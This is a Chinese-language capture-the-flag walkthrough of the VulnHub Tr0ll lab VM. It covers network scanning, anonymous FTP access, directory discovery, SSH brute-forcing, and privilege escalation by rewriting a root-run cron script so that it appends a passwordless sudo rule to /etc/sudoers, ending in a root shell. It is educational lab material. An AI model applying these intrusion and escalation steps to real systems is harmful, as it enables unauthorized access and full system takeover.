Vulnhub-Tr0ll靶场渗透
目标:读取 /root 下的 Proof.txt 文件内容
目标发现
用 arp-scan 扫描子网,发现目标主机
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.168 00:0c:29:51:59:a0 (Unknown)
192.168.120.254 00:50:56:eb:e4:1c (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.862 seconds (137.49 hosts/sec). 4 responded
目标主机ip应该是:192.168.120.168
信息搜集
端口扫描
使用nmap对目标进行端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- -sV -A 192.168.120.168 --min-rate=1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-29 08:15 EDT
Nmap scan report for 192.168.120.168
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.120.160
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/secret
MAC Address: 00:0C:29:51:59:A0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.05 ms 192.168.120.168
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.82 seconds
根据结果,知道目标存在一个网站,存在ftp可以进行匿名访问!!!
FTP匿名访问
直接进行ftp匿名访问,发现只有一个文件,也只能访问当前目录
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.120.168
Connected to 192.168.120.168.
220 (vsFTPd 3.0.2)
Name (192.168.120.168:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64128|).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||43867|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |***********************************************************************************************| 8068 25.19 KiB/s 00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (25.09 KiB/s)
ftp> quit
221 Goodbye.
发现是一个流量文件,其中发现了一个文件
这里也可以使用strings直接读取文件内容,获取其中的纯文本信息:
┌──(root㉿kali)-[/home/kali/Templates]
└─# strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap
从其中也可以看到传输的文件及内容。
目录扫描
使用dirsearch进行目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.120.168
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/_192.168.120.168/_25-03-29_08-32-36.txt
Target: http://192.168.120.168/
[08:32:37] Starting:
...
[08:33:46] 200 - 31B - /robots.txt
[08:33:47] 301 - 318B - /secret -> http://192.168.120.168/secret/
[08:33:47] 200 - 37B - /secret/
...
Task Completed
发现了两个页面和一个目录可以访问
默认页
默认页面打开就一张图片,也没有什么隐藏信息
/robots.txt 页
/secret 页(/secret/ 目录跳转也是这里)
/sup3rs3cr3tdirlol
现在没有其他任何思路了,但整理一下现有的信息,前面那个流量包中传输的文件内容说了一个 sup3rs3cr3tdirlol,根据leetspeak语法,这可能和路径有关,那么尝试在网站上访问。
访问后发现是一个目录,下面有一个elf文件:
其中提到了一个地址 0x0856BF 这有两种可能:
- url的地址
- 内存相关的地址,可能与溢出漏洞有关
/0x0856BF 目录
首先尝试url路径,发现了两个目录
其中good_luck目录下有一个文本文件:
其中有一些Linux命令和未知字符
this_folder_contains_the_password目录下有一个密码文件:
ssh爆破
结合前面得到的两个文件,和现有信息,那个密码只可能是ssh的密钥了,但用户名是
哪一个就不知道了,可以使用 crackmapexec 进行爆破:
经过测试,发现目标ssh存在放爆破机制,只能尝试6次,但依然无法得到密码,但目录名 /this_folder_contains_the_password/ 又说密码在里面,那么唯一还有的信息就是文件名了,经测试,得到了账户:
提权
经测试没有特权命令,不存在sudo、suid提权,也不能查看计划任务。
而且发现存在ssh登录时长限制:
...
Broadcast Message from root@trol
(somewhere) at 7:55 ...
TIMES UP LOL!
Connection to 192.168.120.168 closed by remote host.
Connection to 192.168.120.168 closed.
再次登录,查看是否能查看计划任务日志
overflow@troll:/$ find / -name cronlog 2>/dev/null
/var/log/cronlog
overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py
可以看到是执行一个cleaner.py的脚本文件,那么思路就很清晰了,找到cleaner文件,修改其中的内容,如果其权限为高权限用户,那么就可以进行提权:
overflow@troll:/$ find / -name cleaner.py 2>/dev/null
/lib/log/cleaner.py
overflow@troll:/$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
可以看到找到了该文件,且可以直接执行系统的命令
那么就直接修改其中的命令,拿到sudo所有权限,进行提权:
$ vim /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('echo "overflow ALL=(ALL)NOPASSWD: ALL" >> /etc/sudoers')
except:
sys.exit()
等待一会后成功拿到root shell:
$ sudo -l
sudo: unable to resolve host troll
Matching Defaults entries for overflow on troll:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User overflow may run the following commands on troll:
(ALL) NOPASSWD: ALL
$ sudo /bin/bash
sudo: unable to resolve host troll
root@troll:/# id
uid=0(root) gid=0(root) groups=0(root)
获取flag
直接到root目录下,查找、读取文件即可:
root@troll:/# cd /root
root@troll:/root# ls
proof.txt
root@troll:/root# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
浙公网安备 33010602011771号